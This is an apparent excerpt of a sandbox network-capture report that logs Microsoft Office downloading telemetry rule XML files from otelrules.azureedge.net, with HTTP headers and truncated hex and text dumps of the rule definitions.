                                                  2024-10-13 17:34:29 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  105192.168.2.44987013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:29 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:29 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B984BF177"
                                                  x-ms-request-id: f0065933-d01e-0017-6091-1cb035000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173429Z-17db6f7c8cf9c22xp43k2gbqvn00000002rg00000000fngf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  106192.168.2.44987213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:29 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:29 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:29 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 468
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA642BF4"
                                                  x-ms-request-id: 5a424671-801e-00ac-17e6-1cfd65000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173429Z-17db6f7c8cfwtn5x6ye8p8q9m000000003rg00000000bmgc
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  107192.168.2.44987413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:30 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:30 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:30 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1952
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                  ETag: "0x8DC582B956B0F3D"
                                                  x-ms-request-id: 745077d4-d01e-0082-7c4a-1ce489000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173430Z-17db6f7c8cfjxfnba42c5rukwg000000023000000000efsy
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:30 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  108192.168.2.44987313.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:30 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:30 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 174
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                  ETag: "0x8DC582B91D80E15"
                                                  x-ms-request-id: 8c991e50-501e-00a3-5716-1cc0f2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173430Z-17db6f7c8cfvq8pt2ak3arkg6n000000035000000000cfaa
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:30 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  109192.168.2.44987613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:30 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:30 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 501
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                  ETag: "0x8DC582BACFDAACD"
                                                  x-ms-request-id: 35556aea-401e-0064-3048-1c54af000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173430Z-17db6f7c8cfcl4jvqfdxaxz9w800000002g000000000fmg1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:30 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  110192.168.2.44987513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:30 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:30 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:30 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 958
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                  ETag: "0x8DC582BA0A31B3B"
                                                  x-ms-request-id: 7dbe029a-c01e-007a-2397-1bb877000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173430Z-17db6f7c8cfhrxld7punfw920n00000003ug00000000hgrv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:30 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  111192.168.2.44987713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:30 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:30 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:30 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2592
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5B890DB"
                                                  x-ms-request-id: 529596da-301e-001f-21a5-1caa3a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173430Z-17db6f7c8cfmhggkx889x958tc00000002e0000000005amn
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:30 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  112192.168.2.44987813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3342
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                  ETag: "0x8DC582B927E47E9"
                                                  x-ms-request-id: 2eee43c6-d01e-0066-0203-1bea17000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cfqkqk8bn4ck6f72000000004z000000000a19z
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:31 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  113192.168.2.44987913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2284
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                  ETag: "0x8DC582BCD58BEEE"
                                                  x-ms-request-id: 0cb7a61f-501e-0064-6562-1c1f54000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cfcrfgzd01a8emnyg00000002ug000000000psx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:31 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  114192.168.2.44988013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1393
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                  ETag: "0x8DC582BE3E55B6E"
                                                  x-ms-request-id: 588a334f-a01e-0098-1acf-1a8556000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cfbr2wt66emzt78g400000004sg000000007nxp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:31 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  115192.168.2.44988113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:31 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:31 UTC563INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:31 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1356
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDC681E17"
                                                  x-ms-request-id: a671d058-901e-00a0-5ad6-1a6a6d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173431Z-17db6f7c8cf5mtxmr1c51513n000000005c000000000bpvt
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
